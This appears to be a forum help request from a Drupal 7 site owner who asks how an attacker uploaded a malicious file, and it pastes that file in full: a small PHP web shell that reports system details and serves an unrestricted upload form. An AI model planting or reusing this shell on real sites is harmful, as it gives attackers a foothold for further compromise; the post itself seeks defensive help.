A malicious file has been uploaded by hacker to our Drupal 7 site and tried to hack the file. What could be the possible loophole through which hacker successfully upload the file. We don’t have user login functionality in our site and also there is no file upload functionality in any of form in our site.
Below is the uploaded file content. Can anyone help us please?
<?php echo 'PRIVET BOT BY XSam-XAdoo'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>